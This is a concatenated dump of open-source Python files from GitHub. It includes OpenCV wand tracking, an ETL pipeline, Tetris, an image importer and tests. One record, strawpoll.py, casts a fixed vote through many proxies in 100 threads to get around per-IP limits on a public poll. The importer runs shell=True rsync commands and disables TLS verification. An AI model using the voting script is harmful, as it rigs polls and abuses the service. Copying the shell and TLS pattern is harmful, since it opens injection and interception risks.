self.max_frames_since_no_new_points = 30\n self.frames_since_no_new_points = 0\n\n def run(self, is_remove_background_enabled=False):\n \"\"\"\n Run Spell Detector!\n \"\"\"\n\n cap = cv.VideoCapture(self.video_src) \n while(True):\n ret, frame = cap.read()\n if frame is None:\n break\n\n frame = cv.flip(frame, 1)\n frame_gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n\n if is_remove_background_enabled:\n frame_gray = self.remove_background(frame_gray, threshold_value=215)\n\n # Update points every x frames\n if self.frame_index % self.update_interval == 0:\n self.points = self.find_points(frame_gray)\n\n self.track_wand(frame_gray)\n\n self.frame_index += 1\n self.prev_frame = frame_gray\n\n # Display original video stream\n cv.imshow('Video Stream (RGB)', frame)\n\n # Press 'Q' to quit\n key = cv.waitKey(1)\n if key == ord('q'):\n break\n # Press 'S' to save wand pattern as an image\n elif key == ord('s'):\n if self.wand_pattern is not None:\n self.save_wand_pattern(self.wand_pattern)\n\n cap.release()\n cv.destroyAllWindows()\n\n def remove_background(self, frame_gray, threshold_value=200):\n \"\"\"\n Use background subtraction to improve wand tip detection.\n \"\"\"\n\n mask = self.background_subtractor.apply(frame_gray, learningRate=0.001)\n frame_no_bg = cv.bitwise_and(frame_gray, frame_gray, mask=mask)\n _, frame_thresholded = cv.threshold(frame_gray, threshold_value, 255, cv.THRESH_BINARY)\n\n cv.imshow('Background Removed (B/W)', frame_thresholded)\n\n return frame_thresholded\n\n def find_points(self, frame):\n \"\"\"\n Find points to track... like the wand tip.\n \"\"\"\n\n points = cv.goodFeaturesToTrack(frame, mask=None, **self.feature_params)\n\n vis = frame.copy()\n\n if points is not None:\n for p in points:\n x, y = p.ravel()\n cv.circle(vis, (x, y), 5, (255, 255, 255), thickness=-1)\n\n cv.imshow('Points', vis)\n\n return points\n\n def track_wand(self, frame):\n \"\"\"\n Track the wand tip.\n \"\"\"\n \n if self.prev_frame is None:\n return\n\n vis = frame.copy()\n\n if self.points is None:\n if len(self.wand_tracks) > 0:\n self.frames_since_no_new_points += 1\n\n # Predict and cast spell when no new frames have been added after specified interval\n if self.frames_since_no_new_points > self.max_frames_since_no_new_points:\n self.spell = self.predict_spell(self.wand_pattern)\n self.spellcaster.cast_spell(self.spell)\n \n # Reset\n self.wand_tracks.clear()\n self.frames_since_no_new_points = 0\n else:\n # Calculate optical flow\n new_points, status, err = cv.calcOpticalFlowPyrLK(self.prev_frame, frame, self.points, None, **self.lk_params)\n\n # Select good points\n if new_points is not None:\n good_new = new_points[status==1]\n\n # Update points for optical flow calculation\n self.points = good_new.copy().reshape(-1, 1, 2)\n\n # Add points to tracks array\n for p in self.points:\n x, y = p.ravel()\n self.wand_tracks.append([x, y])\n\n if len(self.wand_tracks) > 0:\n x0, y0 = self.wand_tracks[0]\n for track in self.wand_tracks:\n x1, y1 = track\n cv.line(vis, (x0, y0), (x1, y1), (255, 255, 255), thickness=10)\n\n x0, y0 = track\n\n self.spell = ''\n self.grab_wand_pattern(vis)\n \n cv.putText(vis, 'spell: %s' % self.spell, (10,20), cv.FONT_HERSHEY_PLAIN, 1.0, (255,255,255))\n cv.imshow('Tracked Points', vis)\n\n def grab_wand_pattern(self, frame):\n \"\"\"\n Grab the wand pattern.\n \"\"\"\n\n contours, _ = cv.findContours(frame, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n \n if not contours:\n return\n\n # Assume wand pattern is the first contour...\n contour = 
contours[0]\n\n # Then, crop the pattern\n x, y, w, h = cv.boundingRect(contour)\n cropped_frame = frame[y-10:y+h+10, x-10:x+w+10]\n\n if np.sum(cropped_frame) > 0:\n cropped_frame = cv.resize(cropped_frame, (100, 100))\n self.wand_pattern = cropped_frame.copy()\n\n cv.imshow('Wand Pattern', cropped_frame)\n\n def save_wand_pattern(self, frame, path='./data/'):\n \"\"\"\n Save the wand pattern as an image. Used for data collection & model training.\n \"\"\"\n\n filename = \"pattern_\" + str(time.time()) + \".png\"\n cv.imwrite(os.path.join(path, filename), frame)\n\n\n def predict_spell(self, wand_pattern):\n \"\"\"\n Predict the spell!\n \"\"\"\n\n # Reshape wand pattern frame to be (n_batch=1, height, widgth, n_channels=1)\n wand_pattern = wand_pattern[np.newaxis, :, :, np.newaxis]\n \n predictions = self.spell_classifier.model.predict(wand_pattern)\n predicted_label_index = np.argmax(predictions[0])\n predicted_spell = self.spell_classifier.classes[predicted_label_index]\n print(predicted_spell)\n \n return predicted_spell","repo_name":"estherjk/potter-pi","sub_path":"magic/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":6874,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"39033480337","text":"import numpy as np\nn_lines = 5000000\nn = np.arange(0, n_lines)\nom = np.pi / (n_lines/10.) * n\ny1 = np.sin(om)\ny2 = np.cos(2. * om)\nlines = [f'{{\"omega\": {om[i]}, \"y1\": {y1[i]}, \"y2\": {y2[i]}}}\\n' for i in n]\nwith open(f'my_data_{n_lines}.txt', 'w') as f:\n f.writelines(lines)\n\n\n","repo_name":"shkiefer/dash_large_files","sub_path":"st_make_data.py","file_name":"st_make_data.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"10655435534","text":"import requests, get_proxies, threading, queue\n\nq = queue.Queue()\nthreads_num = 100\npayload = {\"pollId\":6970091,\"votes\":[17]}\n\ndef poll(q):\n while not q.empty():\n proxy = q.get()\n try:\n r = requests.post('https://strawpoll.me/api/v2/votes', json=payload, timeout=20, proxies=proxy)\n print(r.json())\n except Exception: continue\n finally:\n q.task_done()\n print('Кол-во прокси в очереди: %s; Кол-во потоков: %s' %(q.qsize(), threading.active_count()))\n\nfor proxy in get_proxies.proxy_lst:\n q.put({'https': 'http://' + proxy})\n \nfor thr in range(threads_num):\n thr = threading.Thread(target=poll, args=(q,))\n thr.start()\n\nq.join()\n","repo_name":"anon276/testing","sub_path":"strawpoll/release/strawpoll.py","file_name":"strawpoll.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16281105069","text":"from .base import Importer\nimport requests\nfrom subprocess import call\nimport time\nimport os.path\n\n\nclass MMSImporter(Importer):\n\n MMS_DEV='http://dev-mms.thlib.org/media_objects/'\n MMS_STAGE='http://staging-mms.thlib.org/media_objects/'\n MMS_PROD='http://mms.thlib.org/media_objects/'\n\n IIIF_LOC='~/Shares/iiif-live/shanti/'\n\n def __init__(self, id, cookie, out_path=None, photographer='Unknown', collection=None, *args, **kwargs):\n super().__init__(\n id=id,\n cookie=cookie,\n out_path=out_path,\n photographer=photographer,\n collection=collection,\n exists_url='/api/imginfo/mmsid/',\n *args,\n **kwargs\n )\n self.rsync = kwargs.get('rsync')\n self.force_rs = kwargs.get('force_rs')\n\n def _import_metadata(self):\n import_path 
= '/admin/shanti_images/import/json/'\n import_url = self.base + import_path + self.id\n headers = {\n 'Cookie': self.cookie\n }\n\n postdata = {\n 'mmsid': self.id,\n 'source': self.source,\n 'publish': True,\n 'photographer': self.photographer,\n 'coll': self.collection if self.collection else ''\n }\n if self.collection:\n postdata['image_coll_node'] = self.collection\n if self.photographer:\n postdata['default_agent'] = self.photographer\n\n res = requests.post(import_url, headers=headers, data=postdata, verify=False)\n\n if res.status_code != requests.codes.ok:\n self._log('warning', 'Non-200 status returned from POST for ID {}. Code was {}.'.format(\n self.id,\n res.status_code\n ))\n # print(\"Drupal site returned non-200 status: {}\".format(res.json()))\n\n if res.status_code == requests.codes.forbidden:\n self._log('debug',\n 'Forbidden response from POST to server. Likely the cookie is expired, ' +\n 'so the script will exit.')\n exit()\n\n return False\n\n else:\n # If everything went OK (200)\n self.res = res.json()\n\n if self.res and 'status' in self.res.keys():\n if self.res['status'] == '200':\n self._log('info', '200 status returned from POST for ID {}. Payload: {}.'.format(\n self.id,\n self.res\n ))\n return True\n else:\n self._log('info', 'Response from Server with Non-200 Status for ID {}: {} ({})'.format(\n self.id,\n self.res['message'],\n self.res['status']\n ))\n if self.res['status'] == '401':\n raise Exception('Authorization required for posting to server. Check your cookie!')\n else:\n return False\n else:\n self._log('warn', \"No response from server for ID {}\".format(self.id))\n return False\n\n # res.json() looks like this:\n # {\n # 'mmsid': '44301',\n # 'nid': '619213',\n # 'i3fid': 'shanti-image-loc-295724',\n # 'title': '(Untitled)',\n # 'durl': 'https://images.dd:8443/node/619213',\n # 'mmsurl': 'http://staging-mms.thlib.org/media_objects/44301',\n # 'status': '200',\n # 'msg': 'success'\n # }\n\n def _get_rsync(self, i3fid, mmsid):\n\n mmsid = str(mmsid).zfill(5)\n mmspath = mmsid[0:1].zfill(4) + '/' + mmsid[1:].zfill(4)\n srcimg = self.IIIF_LOC + 'prod/' + mmspath + '.jp2'\n destimg = self.IIIF_LOC + self.dest + '/' + i3fid + '.jp2'\n cmd = \"rsync -ah --progress {} {}\\n\".format(srcimg, destimg)\n return cmd\n\n @staticmethod\n def build_rsync(mid):\n info_url = 'https://images.shanti.virginia.edu/api/imginfo/mmsid/'\n mydest = 'prod'\n strmid = str(mid).zfill(5)\n url = info_url + strmid\n # print(\"Calling: {}\".format(url))\n try:\n indoc = requests.get(url, verify=False)\n if indoc and indoc.json():\n jdata = indoc.json()\n newimgnm = jdata.get('i3fid')\n folder = strmid[0:1].zfill(4)\n imgnm = strmid[1:].zfill(4)\n mysource = \"~/Shares/iiif-live/shanti/prod/{}/{}.jp2\".format(folder, imgnm)\n mydest = \"~/Shares/iiif-live/shanti/{}/{}.jp2\".format(mydest, newimgnm)\n mycmd = \"rsync -ah --progress {} {}\\n\".format(mysource, mydest)\n return mycmd\n except requests.exceptions.RequestException as e:\n print(\"Connection could not be made for {}\".format(url))\n return False\n\n def _exec_cmds(self, cmd, verbose=False):\n if self.rsync == 'auto':\n if verbose:\n print(\"Executing Cmd: \\n{}\".format(cmd))\n call(cmd, shell=True)\n elif cmd is not None:\n with open(self.out_path, 'a') as outf:\n outf.write(cmd)\n else:\n print(\"No command created for rsyncing!\")\n\n def _distribute(self, verbose=False):\n url = 'http://fuploadtest.lib.virginia.edu:8091/fupload/distribute'\n if self.dest == 'prod':\n url = url.replace('fuploadtest', 
'fupload')\n        res = requests.get(url)\n\n        if res.status_code != requests.codes.ok:\n            print(\"Could not distribute file on {}: {} - {}\".format(self.dest, res.status_code, res.json()))\n        elif verbose:\n            print(\"File distributed on {}: {}\".format(self.dest, res.json()))\n\n    def run(self):\n        sttm = time.time()\n        idtype = \"List\" if self.id_list else \"Individual\"\n        print(\"Beginning Import, Type: {}\".format(idtype))\n        id_list = self.id_list if self.id_list else [int(self.id)]\n        rsync_cmds = []\n        be_verbose = True\n        impct = 0\n        skipct = 0\n        probs = []\n        # If a list of IDs are given\n        try:\n            for id in id_list:\n                self.id = str(id)\n                try:\n                    if self._already_imported():\n                        print(\"Id {} is already imported.\".format(self.id))\n                        skipct += 1\n                        if self.force_rs:\n                            rsync_cmds.append(self.build_rsync(self.id))\n                    else:\n                        print(\"Importing metadata for {} into {}\".format(self.id, self.base))\n                        success = self._import_metadata()\n                        if success:\n                            impct += 1\n                            rsync_cmds.append(self.build_rsync(self.id))\n                        else:\n                            probs.append(self.id)\n\n                except requests.exceptions.RequestException as e:\n                    print(\"Unable to connect to MMS server for {}: {}\".format(self.id, e))\n                    probs.append(str(id))\n\n        finally:\n            # Only writes Rsync commands for records imported.\n            # To recreate missed rsync commands, use the recover-mms-rsync.py script\n            if self.rsync == 'file' and len(rsync_cmds) > 0:\n                print(\"Creating Rsync commands ....\")\n                if os.path.exists(self.out_path):\n                    answer = input(\"The outfile {} already exists. Write over it? \".format(self.out_path))\n                    if answer != 'y':\n                        return\n\n                with open(self.out_path, 'w') as outf:\n                    for rcmd in rsync_cmds:\n                        outf.write(\"{}\".format(rcmd))\n\n            endtm = time.time()\n            timedelta = endtm - sttm\n            print(\"{} files imported.\".format(impct))\n            print(\"{} were skipped because already imported.\".format(skipct))\n            print(\"{} imports had problems. Check log for details.\".format(len(probs)))\n            print(\"There were problems with the following MMSIDs: {}\".format(', '. 
join(probs)))\n            m, s = divmod(timedelta, 60)\n            h, m = divmod(m, 60)\n            print(\"Time elapsed: %d hrs %02d mins %02d secs\" % (h, m, s))\n\n\n","repo_name":"shanti-uva/mms_image_import","sub_path":"importers/mms.py","file_name":"mms.py","file_ext":"py","file_size_in_byte":8303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25711475918","text":"#Team Members\r\n#Shubh Deep 2018A7PS0162H\r\n#Shivang Singh 2018A7PS0115H\r\n#Nishit Chouhan 2018A7PS0446H\r\n#Deepak George 2018A7PS0244H\r\nimport sys\r\nimport os\r\nsys.path.append(\"../\")\r\nfrom protocol_files.rudp_protocol import RUDP\r\nimport time\r\n\r\ndef chunks(lst, n):\r\n    \"Yield successive n-sized chunks from lst\"\r\n    list = []\r\n    for i in range(0, len(lst), n):\r\n        end = min(i + n, len(lst))\r\n        list.append(lst[i:end])\r\n    return list\r\n\r\nprint(\"I'm in client\")\r\nfilename = sys.argv[1]\r\nfilesize = os.path.getsize(filename)\r\ndata = (filename, filesize)\r\n\r\nr = RUDP(\"127.0.0.1\", 9001, False)\r\nr.connect_sock(\"127.0.0.1\", 9002)\r\nr.listen()\r\nwhile(r.is_conn_est == False):\r\n    pass\r\nr.send(data)\r\nwith open(filename, \"rb\") as f:\r\n    contents = f.read()\r\n    # print(contents)\r\n    list1 = chunks(contents, 2048)\r\n    for chunk in list1:\r\n        # print(\"chunk from client :\", chunk)\r\n        r.send(chunk)\r\n# r.disconnect()","repo_name":"queenofthelosers/reliable-udp-middleware","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14252148448","text":"\"\"\"\nDisaster response pipeline project\nfunctions to pre-process data : run ETL pipeline that cleans data and stores in a sqlite database\n\nSample Script Execution:\n- To run ETL pipeline that cleans data and stores in database:\n    > python data/process_data.py data/disaster_messages.csv data/disaster_categories.csv data/DisasterResponse.db\n\"\"\"\n\n# import packages\nimport sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\n\ndef load_data(messages_filepath: str, categories_filepath: str):\n    \"\"\"\n    takes inputs as two csvs, combines them through 'id' and returns the combined pandas data frame\n    :param messages_filepath: csv file with messages and a unique id\n    :param categories_filepath: csv file with categories and unique id\n    :return: pandas data frame with merged messages and categories\n    \"\"\"\n    # import data from csv\n    messages = pd.read_csv(messages_filepath)\n    categories = pd.read_csv(categories_filepath)\n    df = pd.merge(messages, categories, on='id')\n    return df\n\n\ndef clean_data(df):\n    \"\"\"\n    - takes the input of pandas dataframe with column named 'categories' with data like below\n      ex: related-1;request-0;offer-0;aid_related-0;\n    - make a separate set of columns by splitting from ; and getting the numbers specified there as relevant values\n      ex : related | request | offer | aid_related\n              1    |    0    |   0   |      0\n    - combine it with the df replacing the categories column with this new set of columns\n      and drop duplicates\n    :param df: python data frame with a column named categories\n    :return: df_cleaned : pandas dataframe with categories column split by ; and relevant number\n    \"\"\"\n    # create a data frame by splitting data by ';' and creating separate columns for each\n    categories = df.categories.str.split(';', expand=True)\n    # get the column names for added categories columns by extracting them from the first row of the dataframe\n    
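# each cell looks like 'related-1' (see the docstring example above); x[:-2] strips the trailing '-0'/'-1', leaving just the category name\n    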
firstrow = categories.iloc[0, :]\n    category_colnames = firstrow.apply(lambda x: x[:-2])\n    categories.columns = category_colnames\n    # iterate through each column and keep the last character as 1/0\n    for column in categories:\n        categories[column] = categories[column].str[-1]\n        categories[column] = categories[column].astype(int)\n        # convert to binary\n        categories.loc[categories[column] > 1, column] = 1\n    # drop the column - categories and concatenate the cleaned set of split columns\n    df = df.drop('categories', axis=1)\n    df = pd.concat([df, categories], axis=1)\n    df_cleaned = df.drop_duplicates()\n    return df_cleaned\n\n\ndef save_data(df, database_filename):\n    \"\"\"\n    save the clean data set into an sqlite database, replacing it if it exists\n    :param df: pandas data frame to save\n    :param database_filename: database name with extension .db\n    ex: messages.db\n    :return: None\n    \"\"\"\n    table_name = 'labelled_disaster_messages'\n    engine = create_engine('sqlite:///{}'.format(database_filename))\n    df.to_sql(table_name, engine, index=False, if_exists='replace')\n\n\ndef main():\n    \"\"\"\n    main function to run the ETL pipeline\n    1. load the csv files\n    2. data cleaning\n    3. data loading to sqlite database\n    \"\"\"\n    if len(sys.argv) == 4:\n        messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n        print('Loading data...\\n    MESSAGES: {}\\n    CATEGORIES: {}'\n              .format(messages_filepath, categories_filepath))\n        df = load_data(messages_filepath, categories_filepath)\n\n        print('Cleaning data...')\n        df = clean_data(df)\n\n        print('Saving data...\\n    DATABASE: {}'.format(database_filepath))\n        save_data(df, database_filepath)\n\n        print('Cleaned data saved to database!')\n\n    else:\n        print('Please provide the filepaths of the messages and categories ' \\\n              'datasets as the first and second argument respectively, as ' \\\n              'well as the filepath of the database to save the cleaned data ' \\\n              'to as the third argument. 
\\n\\nExample: python process_data.py ' \\\n              'disaster_messages.csv disaster_categories.csv ' \\\n              'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Dinusha519/disaster_response_pipeline","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1252494898","text":"N, M = map(int, input().split())\nMap = [list(input()) for _ in range(N)]\n\nused = [[0]*M for _ in range(N)]\ndef BFS(y, x):\n    used[y][x] = 1\n    queue = [(y, x)]\n    dy = [-1, 1, 0, 0]\n    dx = [0, 0, -1, 1]\n    cnt = 0\n\n    while queue:\n        y, x = queue.pop(0)\n        for i in range(4):\n            ny = y + dy[i]\n            nx = x + dx[i]\n            if 0 <= ny < N and 0 <= nx < M:\n                if Map[ny][nx] == 'X': continue\n                if used[ny][nx] == 1: continue\n                if Map[ny][nx] == 'P':\n                    cnt += 1\n                queue.append((ny, nx))\n                used[ny][nx] = 1\n    return cnt\n\nresult = 0\nfor i in range(N):\n    for j in range(M):\n        if Map[i][j] == 'I':\n            result = BFS(i, j)\n\nif result:\n    print(result)\nelse:\n    print('TT')\n\n","repo_name":"swjiae/Algorithm","sub_path":"Algorithm/AlgoStudy/Week2/BFS_21736.py","file_name":"BFS_21736.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20298536772","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = \"ipetrash\"\n\n\nfrom PyQt5.QtCore import QObject, pyqtSignal\nfrom PyQt5.QtGui import QColor\n\nfrom common import logger\nfrom piece import Piece\n\n\nclass Board(QObject):\n    ROWS = 20\n    COLS = 10\n\n    on_update_score = pyqtSignal(int)\n\n    def __init__(self):\n        super().__init__()\n\n        self.matrix: list[list[QColor | None]] = [\n            [None for _ in range(self.COLS)]\n            for _ in range(self.ROWS)\n        ]\n\n        self.current_piece: Piece = None\n        self.next_piece: Piece = None\n\n        self.__score: int = 0\n\n    @property\n    def score(self) -> int:\n        return self.__score\n\n    @score.setter\n    def score(self, value: int):\n        self.__score = value\n        self.on_update_score.emit(self.score)\n\n    def add_piece(self, piece: Piece):\n        logger.debug(\"[add_piece]\")\n        for x, y in piece.get_points():\n            self.matrix[y][x] = piece.get_color()\n\n    def _do_make_collapse_of_rows(self):\n        to_delete = []\n        for row in reversed(self.matrix):\n            if all(color for color in row):\n                to_delete.append(row)\n\n        for row in to_delete:\n            self.matrix.remove(row)\n            self.matrix.insert(0, [None for _ in range(self.COLS)])\n\n        # If any rows were removed\n        if to_delete:\n            self.score += {1: 100, 2: 300, 3: 700, 4: 1500}[len(to_delete)]\n\n    def _get_random_piece(self) -> Piece:\n        return Piece.get_random(\n            x=self.COLS // 2,  # By default, in the center\n            y=0,\n            parent=self,\n        )\n\n    def do_step(self) -> bool:\n        if not self.current_piece:\n            if self.next_piece:\n                self.current_piece = self.next_piece\n            else:\n                self.current_piece = self._get_random_piece()\n\n            self.next_piece = self._get_random_piece()\n\n            # If there is a collision right after spawning\n            if self.current_piece.is_collapse():\n                return False\n\n            return True\n\n        if not self.current_piece.move_down():\n            self.add_piece(self.current_piece)\n            self.current_piece = None\n\n            self._do_make_collapse_of_rows()\n\n        return True\n","repo_name":"gil9red/SimplePyScripts","sub_path":"games/tetris/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"5"} 
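The collapse-and-score step in Board._do_make_collapse_of_rows above removes every fully occupied row, re-inserts empty rows at the top, and pays out super-linearly per clear (100/300/700/1500 points for 1-4 rows). A minimal, self-contained sketch of that logic, assuming plain lists instead of the PyQt5-backed matrix and an `is not None` cell test in place of the original truthiness check (the helper name collapse_full_rows is hypothetical):

COLS = 10
SCORE_BY_ROWS = {1: 100, 2: 300, 3: 700, 4: 1500}  # same payout table as Board

def collapse_full_rows(matrix):
    # Drop each fully occupied row and pad the top with fresh empty rows,
    # mirroring Board._do_make_collapse_of_rows.
    full = [row for row in matrix if all(cell is not None for cell in row)]
    for row in full:
        matrix.remove(row)
        matrix.insert(0, [None] * COLS)
    return SCORE_BY_ROWS.get(len(full), 0)

# One full row in a three-row board scores 100 and leaves an all-empty board:
board = [[None] * COLS, ['x'] * COLS, [None] * COLS]
assert collapse_full_rows(board) == 100
assert board == [[None] * COLS] * 3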
+{"seq_id":"70903428951","text":"import gin\nimport random\nimport typer\n\n# allows typer commands\napp = typer.Typer()\n\n# configurables for gin\n@gin.configurable()\ndef function(name, food, price=gin.REQUIRED):\n '''print favorite food'''\n print('%s likes %s, if cheaper than %s.' %(name, food, round(price, 2)))\n return\n\n# make existing function configurable\ngin.external_configurable(random.uniform)\n\n# example to outline gin-config functionalities\n@app.command('config')\ndef gin_config_example():\n\n gin.parse_config_file('config.gin')\n\n # root scope\n function()\n\n # sub-scope\n with gin.config_scope('ana'): function()\n with gin.config_scope('wessel'): function()\n\n# example to outline typer functionalities\n@app.command('typer')\ndef typer_example(scope:str, showroot:bool = True):\n\n gin.parse_config_file('config.gin')\n\n # root scope\n if showroot:\n function()\n \n # sub-scope\n with gin.config_scope(scope): function()\n\n\n\ndef cli() -> None:\n \"\"\"Helper function to start cli via poetry scripts.\"\"\"\n app()\n\nif __name__ == '__main__':\n app()\n\n\n\n","repo_name":"mkmbader/ginconfig","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6070142133","text":"#\n# @lc app=leetcode id=375 lang=python3\n#\n# [375] Guess Number Higher or Lower II\n#\n\n\n# @lc code=start\nclass Solution:\n def getMoneyAmount(self, n: int) -> int:\n dp = [[0] * (n + 1) for _ in range(n + 1)]\n for length in range(2, n + 1):\n for start in range(n - length + 1):\n local_min = float(\"inf\")\n for piv in range(start, start + length):\n local_min = min(\n local_min,\n piv + 1 + max(dp[start][piv], dp[piv + 1][start + length]))\n dp[start][start + length] = local_min\n return dp[0][-1]\n\n\n# @lc code=end\n","repo_name":"mingaki/leetcode","sub_path":"375.guess-number-higher-or-lower-ii.py","file_name":"375.guess-number-higher-or-lower-ii.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71551050071","text":"import json\nimport os\nfrom pathlib import Path\n\nimport jsonref # type: ignore\nimport pytest\n\nfrom json_expand_o_matic import JsonExpandOMatic\n\n\ndef idfn(fixture_value):\n if fixture_value == {}:\n return \"\"\n return \"+\".join([f\"{k}:{v}\" for k, v in fixture_value.items()])\n\n\nclass TestSimple:\n \"\"\"Test the basics.\"\"\"\n\n # Our raw test data.\n _raw_data = None\n\n @pytest.fixture\n def raw_data(self, resource_path_root):\n if not TestSimple._raw_data:\n TestSimple._raw_data = json.loads((resource_path_root / \"actor-data.json\").read_text())\n return TestSimple._raw_data\n\n # Fixtures to provide copies of the raw data to each test function.\n\n @pytest.fixture(\n params=[\n {},\n # ExpansionPool parameters.\n # This tests acceptable combinations.\n # Combinations that would fail assertions\n # (e.g. 
- in ExpansionPool._set_pool_size) are not included.\n            {\"pool_disable\": True},  # Force pool_size=1\n            {\"pool_size\": 0},  # pool_size will be os.cpu_count()\n            {\"pool_size\": 1},  # pool_ratio is ignored\n            {\"pool_size\": 2},  # pool_mode default is SharedMemoryArray\n            {\"pool_size\": 2, \"pool_mode\": \"ArrayOfTuples\"},\n            {\"pool_ratio\": 0.5},  # pool_size must be None\n            # ExpansionZipper parameters.\n            # Not exercising OutputChoice yet.\n            {\"zip_root\": \"foo\"},\n            {\"zip_root\": \"bar\", \"zip_file\": \"zippy\"},\n            {\"zip_file\": \"zipster.zip\"},\n            {\"zip_output\": \"UnZipped\"},\n        ],\n        ids=idfn,\n    )\n    def expander_options(self, request):\n        yield request.param\n\n    @pytest.fixture(\n        params=[\n            {\"hash_mode\": None},\n            {\"hash_mode\": \"HASH_MD5\"},\n        ],\n        ids=[\"NoChecksum\", \"HASH_MD5\"],\n    )\n    def hash_option(self, request):\n        yield request.param\n\n    @pytest.fixture\n    def test_data(self, raw_data):\n        return json.loads(json.dumps(raw_data))\n\n    @pytest.fixture\n    def original_data(self, raw_data):\n        return json.loads(json.dumps(raw_data))\n\n    def test_equivalency(self, test_data, original_data):\n        # Assert that independent copies of the raw data are equivalent.\n        assert test_data == original_data\n\n    def test_expand_preserve(self, tmpdir, test_data, original_data, expander_options, hash_option):\n        expanded = JsonExpandOMatic(path=tmpdir).expand(\n            test_data, root_element=\"root\", preserve=True, **expander_options, **hash_option\n        )\n\n        ref_root = expander_options.get(\"zip_root\", tmpdir.basename)\n\n        # preserve=True prevents mangling of test_data by expand()\n        assert test_data == original_data\n\n        # expand() returns a new representation of `data`\n        assert expanded == {\"root\": {\"$ref\": f\"{ref_root}/root.json\"}}\n\n    def test_expand_mangle(self, tmpdir, test_data, original_data, expander_options, hash_option):\n        expanded = JsonExpandOMatic(path=tmpdir).expand(\n            test_data, root_element=\"root\", preserve=False, **expander_options, **hash_option\n        )\n\n        if \"zip_root\" in expander_options:\n            ref_root = expander_options[\"zip_root\"]\n            root_json = Path(tmpdir) / expander_options[\"zip_root\"] / \"root.json\"\n        else:\n            ref_root = tmpdir.basename\n            root_json = Path(tmpdir) / \"root.json\"\n\n        # preserve=False allows mangling of test_data by expand()\n        assert test_data != original_data\n\n        # test_data is the content of \"{ref_root}/root.json\"\n        assert test_data == json.loads(root_json.read_text())\n\n        # expand() returns a new representation of `data`\n        assert expanded == {\"root\": {\"$ref\": f\"{ref_root}/root.json\"}}\n\n    def test_file_existence(self, tmpdir, test_data, original_data, expander_options):\n        expanded = JsonExpandOMatic(path=tmpdir).expand(test_data, root_element=\"root\", **expander_options)\n\n        if \"zip_root\" in expander_options:\n            ref_root = expander_options[\"zip_root\"]\n            json_root = Path(tmpdir) / expander_options[\"zip_root\"]\n        else:\n            ref_root = tmpdir.basename\n            json_root = Path(tmpdir)\n\n        assert expanded == {\"root\": {\"$ref\": f\"{ref_root}/root.json\"}}\n\n        # This is the wrapper around the original data\n        assert os.path.exists(f\"{json_root}/root.json\")\n        assert os.path.exists(f\"{json_root}/root\")\n\n        # Now we look at the original data's files\n        assert os.path.exists(f\"{json_root}/root/actors.json\")\n        assert os.path.exists(f\"{json_root}/root/actors\")\n        # A file and directory for each actor\n        assert os.path.exists(f\"{json_root}/root/actors/charlie_chaplin.json\")\n        assert os.path.exists(f\"{json_root}/root/actors/charlie_chaplin\")\n        assert 
os.path.exists(f\"{json_root}/root/actors/dwayne_johnson.json\")\n        assert os.path.exists(f\"{json_root}/root/actors/dwayne_johnson\")\n        # A file and directory for each actor's movies\n        assert os.path.exists(f\"{json_root}/root/actors/charlie_chaplin/movies.json\")\n        assert os.path.exists(f\"{json_root}/root/actors/charlie_chaplin/movies\")\n        assert os.path.exists(f\"{json_root}/root/actors/dwayne_johnson/movies.json\")\n        assert os.path.exists(f\"{json_root}/root/actors/dwayne_johnson/movies\")\n        # A file and directory for Charlie Chaplin's filmography.\n        assert os.path.exists(f\"{json_root}/root/actors/charlie_chaplin/filmography.json\")\n        assert os.path.exists(f\"{json_root}/root/actors/charlie_chaplin/filmography\")\n        # I didn't define filmography test data for Dwayne Johnson.\n        assert not os.path.exists(f\"{json_root}/root/actors/dwayne_johnson/filmography.json\")\n        assert not os.path.exists(f\"{json_root}/root/actors/dwayne_johnson/filmography\")\n        # But I did define an empty hobbies directory for Dwayne Johnson so we will have\n        # a file but not a directory (since there was nothing to recurse into).\n        assert os.path.exists(f\"{json_root}/root/actors/dwayne_johnson/hobbies.json\")\n        assert not os.path.exists(f\"{json_root}/root/actors/dwayne_johnson/hobbies\")\n\n        # I'm not going to go any deeper. You get the idea...\n        # See `test_leaves.py` for some more interesting things about the files.\n\n    def test_contract(self, tmpdir, test_data, original_data):\n        expanded = JsonExpandOMatic(path=tmpdir).expand(test_data, root_element=\"root\", preserve=False)\n        assert expanded == {\"root\": {\"$ref\": f\"{tmpdir.basename}/root.json\"}}\n\n        # We can use JsonExpandOMatic() to load the expanded data from the filesystem.\n        # Note that this returns the original data exactly, the `root` wrapper is removed.\n        contracted = JsonExpandOMatic(path=tmpdir).contract(root_element=\"root\")\n        assert contracted == original_data\n\n        # Or we can use jsonref.load() to do the same.\n        with 